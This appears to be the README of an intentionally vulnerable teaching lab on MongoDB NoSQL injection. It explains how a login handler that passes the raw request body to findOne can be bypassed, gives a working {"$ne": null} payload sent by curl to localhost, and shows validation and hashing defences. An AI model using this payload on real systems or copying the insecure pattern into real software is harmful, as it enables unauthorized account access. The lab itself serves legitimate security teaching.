🧪 NoSQL Lab (Educational Only)

This is a small educational application that demonstrates how a NoSQL (MongoDB) injection vulnerability arises when a login handler passes user-supplied JSON, unvalidated, straight into a database query.

⚠️ Important: This project is intentionally vulnerable and must not be used in real-world or production environments. It exists purely for learning and experimentation.

Tech stack:

  • Node.js + Express
  • TypeScript
  • EJS templates
  • MongoDB + Mongoose
  • Bootstrap (via CDN)

🚀 Quick start (development)

  1. Copy .env.example to .env and adjust values if needed:

    cp .env.example .env
  2. Start MongoDB with Docker (optional):

    docker-compose up -d
  3. Install dependencies and run the development server:

    npm install
    npm run dev
  4. Seed the admin user (prints credentials to console):

    npm run seed
  5. Open the site: http://localhost:3000


🕵️ How the vulnerability works

The /login POST endpoint passes req.body, unchanged, as the filter for:

User.findOne(req.body)

Mongoose forwards that object to MongoDB as a query filter. In a filter, a string value is a literal to compare against, but an object value whose keys start with $ is interpreted as a query operator. So when the request is sent as JSON (Content-Type: application/json), a crafted body such as:

{
  "username": {"$ne": null},
  "password": {"$ne": null}
}

no longer means "username equals X and password equals Y" but "username is not null and password is not null", which matches every user document. findOne returns the first match (with no sort, usually the earliest inserted user; in this lab the seeded admin if it is the only user), so the login succeeds without a valid password. Note that the same nested object can also arrive from a form body if the app parses form data with extended (qs-style) bracket syntax such as username[$ne]=, so the real defence is checking that each field is a plain string, not merely avoiding the JSON parser. This is intentional, for learning how NoSQL injection works.
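To make the two query shapes concrete, here is an added example in TypeScript; it is not part of the lab's own code. It reduces the handler to the filter object it builds: the lab's pattern, which forwards the raw body, next to a validated version. The names validateLogin, safeFilter, containsOperator and matchesDoc are assumptions for this example, the user list and request bodies are constructed inline, and matchesDoc is a deliberately simplified stand-in for MongoDB's filter evaluation (equality and $ne only, not the real engine) that exists only to show why the injected filter matches every user.

```typescript
// Added example, not the lab's own code. Shows the filter object the login handler
// hands to User.findOne in the vulnerable and in a hardened version, and why the
// injected body matches every user. Names below (validateLogin, safeFilter,
// containsOperator, matchesDoc) are assumptions for this example.

type Doc = Record<string, unknown>;
type LoginFields = { username: string; password: string };

// The lab's vulnerable pattern, reduced to its essence: the parsed JSON body *is*
// the MongoDB filter, so value objects such as {"$ne": null} become query operators.
function vulnerableFilter(body: unknown): Doc {
  return body as Doc;
}

// Hardened input handling: only the two expected keys, both plain strings, with
// length limits. Operators can only be expressed as objects, so the string check
// alone already removes them; the key whitelist stops extra filter fields.
function validateLogin(body: unknown): LoginFields | null {
  if (typeof body !== 'object' || body === null || Array.isArray(body)) return null;
  const { username, password, ...rest } = body as Doc;
  if (Object.keys(rest).length !== 0) return null;
  if (typeof username !== 'string' || typeof password !== 'string') return null;
  if (username.length === 0 || username.length > 64 || password.length > 256) return null;
  return { username, password };
}

// The filter a hardened handler would actually run: look the user up by username
// only. The password never enters the query; it is checked afterwards against a
// stored hash (e.g. bcrypt.compare), which is outside this example. A string value
// in a filter is always a literal, even if it contains '$'.
function safeFilter(fields: LoginFields): { username: string } {
  return { username: fields.username };
}

// Defence in depth for endpoints that legitimately accept nested documents:
// reject any key that MongoDB would treat as an operator or as a dotted path.
// (Packages such as express-mongo-sanitize strip these keys instead of rejecting.)
function containsOperator(value: unknown): boolean {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (typeof value === 'object' && value !== null) {
    return Object.entries(value as Doc).some(
      ([k, v]) => k.startsWith('$') || k.includes('.') || containsOperator(v),
    );
  }
  return false;
}

// Deliberately simplified stand-in for MongoDB's filter evaluation: plain
// equality and the $ne operator only. Not the real engine; just enough to show
// why the injected filter matches everything.
function matchesDoc(filter: Doc, doc: Doc): boolean {
  return Object.entries(filter).every(([field, cond]) => {
    if (typeof cond === 'object' && cond !== null && '$ne' in cond) {
      return doc[field] !== (cond as { $ne: unknown }).$ne;
    }
    return doc[field] === cond;
  });
}

// Constructed sample data: two users (plaintext passwords only because this is a
// model of the query, not of storage; a real app stores hashes) and two bodies.
const users: Doc[] = [
  { username: 'admin', password: 'correct horse' },
  { username: 'alice', password: 'battery staple' },
];
const injectedBody: unknown = JSON.parse('{"username":{"$ne":null},"password":{"$ne":null}}');
const normalBody: unknown = JSON.parse('{"username":"admin","password":"correct horse"}');

function countMatches(filter: Doc): number {
  return users.filter((u) => matchesDoc(filter, u)).length;
}

console.log('vulnerable, injected body matches:', countMatches(vulnerableFilter(injectedBody))); // 2
console.log('vulnerable, normal body matches:', countMatches(vulnerableFilter(normalBody)));     // 1
console.log('validated, injected body:', validateLogin(injectedBody));                            // null
const ok = validateLogin(normalBody);
console.log('validated, normal body matches:', ok ? countMatches(safeFilter(ok)) : 'rejected');  // 1
```

The point to take away is the asymmetry between keys and values: a filter value that is a string can never become an operator, so enforcing "these two fields are strings" at the boundary closes the bypass regardless of which body parser produced the object. containsOperator is only needed where a route must accept nested documents; for a login form the stricter validateLogin is the right tool.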


🔍 Example injected request (for lab learning only)

If you seeded an admin user and want to test the vulnerability, send the operator objects as a JSON body and compare the response with that of a normal request whose username and password are plain (wrong) strings:

curl -s -X POST http://localhost:3000/login \
  -H 'Content-Type: application/json' \
  -d '{"username":{"$ne":null},"password":{"$ne":null}}' -v

📚 Notes & Caution

  • This repository (nosql-lab) is only for educational and research purposes. 🧑‍🏫
  • It intentionally includes insecure patterns.
  • In real applications, validate that login fields are plain strings (reject objects, arrays and keys starting with $), build the query from explicitly chosen fields rather than from the raw request body, and verify the password against a stored hash (for example bcrypt) after the lookup instead of putting it into the query.
  • Do not deploy this code to production or any publicly accessible environment.

Enjoy exploring the lab and learning about secure coding!